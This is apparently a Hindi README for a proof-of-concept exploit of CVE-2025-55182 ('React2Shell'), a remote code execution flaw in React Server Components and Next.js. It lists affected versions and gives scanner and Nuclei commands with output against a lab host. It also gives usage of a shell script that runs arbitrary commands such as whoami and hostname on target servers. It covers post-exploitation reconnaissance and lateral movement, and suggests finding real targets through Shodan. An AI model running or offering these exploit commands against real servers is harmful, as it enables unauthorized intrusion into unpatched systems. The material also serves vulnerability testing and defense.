
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2025-55182 (React2Shell) RCE भेद्यता के लिए React सर्वर घटकों में। इसमें संवेदनशील होस्ट के लिए एक स्कैनर और दूरस्थ कमांड निष्पादन के लिए एक शेल स्क्रिप्ट शामिल है। केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए।
CVE-2025-55182, जिसे React2Shell के नाम से भी जाना जाता है, एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) कमजोरी है जो React सर्वर घटकों (RSC) को प्रभावित करती है। यह क्लाइंट और सर्वर के बीच संचार के लिए Flight प्रोटोकॉल का उपयोग करता है। जब क्लाइंट डेटा का अनुरोध करता है, तो सर्वर एक पेलोड प्राप्त करता है, इस पेलोड को पार्स करता है, जो हमलावर को दुर्भावनापूर्ण संरचनाओं या मनमाने कोड को इंजेक्ट करने की अनुमति दे सकता है जिसे React वैध मानता है।
| शीर्षक | विवरण |
|---|---|
| गंभीरता | गंभीर (CVSS 10.0) |
| प्रकार | असुरक्षित डिसीरियलाइज़ेशन (CWE-502) |
| हमला विधि | दूरस्थ, प्रमाणीकरण की आवश्यकता नहीं |
| प्रभावित संस्करण: | React: 19.0.0, 19.1.0, 19.1.1, 19.2.0 और Next.js: 15.0.0 – 15.0.4, 15.1.0 – 15.1.8, 15.2.0 – 15.2.5, 15.3.0 – 15.3.5, 15.4.0 – 15.4.7, 15.5.0 – 15.5.6, 16.0.0 – 16.0.6 |
सर्वर क्लाइंट से पेलोड को बिना पूर्ण सत्यापन के संसाधित करता है, जो हमलावर को अनुमति देता है:
इस कमजोरी से संबंधित शोषण गतिविधियाँ 5 दिसंबर 2025 से पाई गई हैं। अधिकांश सफल शोषण हमले समूहों के मूल्यांकन से उत्पन्न हुए हैं। विंडोज और लिनक्स दोनों वातावरण प्रभावित हैं।
स्थापना
pip install -r requirements.txt
एक कमजोर सर्वर स्कैन करें:
python3 scanner.py -u https://example.com
स्कैन करने का पथ दर्ज करें (यहाँ मैं अपना कमजोर सर्वर दर्ज कर रहा हूँ: http://192.168.10.1:3000)
प्राप्त परिणाम:
╰─ python3 scanner.py -u http://192.168.10.1:3000
brought to you by assetnote
[*] Loaded 1 host(s) to scan
[*] Using 10 thread(s)
[*] Timeout: 10s
[*] Using RCE PoC check
[!] SSL verification disabled
[VULNERABLE] http://192.168.10.1:3000 - Status: 303
होस्टों की सूची स्कैन करें:
python3 scanner.py -l hosts.txt
एकाधिक थ्रेड्स से स्कैन करें और परिणाम सहेजें:
python3 scanner.py -l hosts.txt -t 20 -o results.json
कस्टम हेडर के साथ स्कैन करें:
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"
विंडोज लक्ष्यों को स्कैन करें:
python3 scanner.py -u https://example.com --windows
सुरक्षित साइड-चैनल पहचान विधि का उपयोग करें:
python3 scanner.py -u https://example.com --safe-check
जैसा कि आप देख सकते हैं, हम एक सुरक्षा कमजोरी का सामना कर रहे हैं, जिसका अर्थ है कि हमारा प्रदान किया गया सर्वर हमलावर द्वारा हमले के लिए असुरक्षित है।
अब हम Nuclei का उपयोग करके जाँच करेंगे कि उपरोक्त सर्वर में कौन सी कमजोरी है और क्या इसका POC है। यह सुविधा कस्टम अनुरोध भेजकर, गलत अलार्म (false positive) को कम करके और समानांतर स्कैनिंग का समर्थन करके काम करती है।
nuclei -t scan.yaml -u http://192.168.10.1:3000
प्राप्त परिणाम
[INF] Current nuclei version: v3.7.1 (latest)
[INF] Current nuclei-templates version: v10.4.0 (latest)
[INF] New templates added in latest release: 94
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-55182] [http] [critical] http://192.168.10.1:3000
[INF] Scan completed in 431.97876ms. 1 matches found.
सिस्टम ने पता लगाया है कि यह सर्वर कमजोर है और CVE-2025-55182 कमजोरी द्वारा शोषण किया जा सकता है। और इससे आप देख सकते हैं कि यह एक काफी खतरनाक और महत्वपूर्ण कमजोरी है, जिसके कई POC सोशल प्लेटफॉर्म पर उपलब्ध हैं। ☺☺☺
आप देख सकते हैं कि उपरोक्त अनुप्रयोग में सुरक्षा कमजोरी के अस्तित्व की पुष्टि करने के लिए यह जानकारी पर्याप्त है। यह साबित करने के लिए कि इस एप्लिकेशन का उपयोग कमांड चलाने या दूरस्थ रूप से कोड निष्पादित करने के लिए किया जा सकता है, मैं PoC शुरू करूंगा।
chmod +x scanner.sh
# Check xem đối phương có vulnerable ko
./datscan.sh -d example.com
# Thực thi lệnh kiểm tra user hiện tại
./datscan.sh -d example.com -c "whoami"
# With full URL
./datscan.sh -d example.com -c "uname -a"
अर्थ:
सर्वर प्रक्रिया चलाने वाले वर्तमान उपयोगकर्ता को लौटाता है
पहचानने में मदद करता है:
=> यह RCE की सफलता की पुष्टि करने के लिए सबसे बुनियादी कमांड है
-d, --domain - domain/URL-c, --command - निष्पादित करने का आदेश (जैसे: whoami, hostname,...)# Check xem tên máy
./datscan.sh -d http://192.168.10.1:3000/ -c hostname
# Xác định phiên bản hệ điều hành
./datscan.sh -d http://192.168.10.1:3000/ -c ver
# Kiểm tra command execution có hoạt động ổn định không
./datscan.sh -c "echo test"
./datscan.sh -d http://192.168.10.1:3000/ -c "echo %USERNAME%"
./datscan.sh -d http://192.168.10.1:3000/ -c "echo %COMPUTERNAME%"
यह सफल शोषण के बाद प्रारंभिक टोही (initial reconnaissance) कदम है।
हमें पुष्टि करने में मदद करता है: RCE काम कर रहा है, ऑपरेटिंग सिस्टम की पहचान करें,...
चूंकि यह प्रयोग मैं व्यक्तिगत लैब वातावरण में प्रदर्शित कर रहा हूँ ताकि अवैध गतिविधियों से बचा जा सके, इसलिए डेटा चुराने के लिए HTTP हेडर का उपयोग, बड़े आउटपुट या विशेष वर्ण निम्न का कारण बन सकते हैं:
ERR_INVALID_CHAR
छोटे कमांड (जैसे: whoami, ver) उपरोक्त परीक्षण वातावरण में प्रदर्शित करने के लिए अधिक विश्वसनीय हैं।
यदि आप चाहें तो Shodan का उपयोग करके वास्तविक वातावरण में सीधे IP पतों की जांच कर सकते हैं और अपने उपरोक्त प्रयोग के अनुसार शोषण कर सकते हैं (अनुशंसित नहीं)।
जैसा कि ऊपर बताया गया है। यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। इस उपकरण का उपयोग उन सिस्टमों पर परीक्षण करने के लिए न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है।
| निष्पादित आदेशों का अर्थ | विवरण |
|---|
| मशीन का नाम (होस्ट नाम) लौटाता है | उपयोग: - प्रभावित सिस्टम की पहचान करना - पार्श्व आंदोलन (lateral movement) के लिए (आंतरिक वातावरण में) |
| ऑपरेटिंग सिस्टम संस्करण निर्धारित करें | महत्वपूर्ण: - आगे के शोषण की संभावना (विशेषाधिकार वृद्धि) का आकलन करना - उपयुक्त एक्सप्लॉइट चुनना |
| कमांड निष्पादन की जाँच करें | पेलोड / स्कैनर को डीबग करने के लिए उपयोग करें |
| वर्तमान उपयोगकर्ता नाम लौटाता है | इस मामले में: - उपयोगकर्ता ADMIN है → उच्च विशेषाधिकार हो सकते हैं - कुछ विंडोज मामलों में whoami से अधिक महत्वपूर्ण |
| मशीन का नाम लौटाता है | पर्यावरण चर के माध्यम से मशीन का नाम लौटाता है |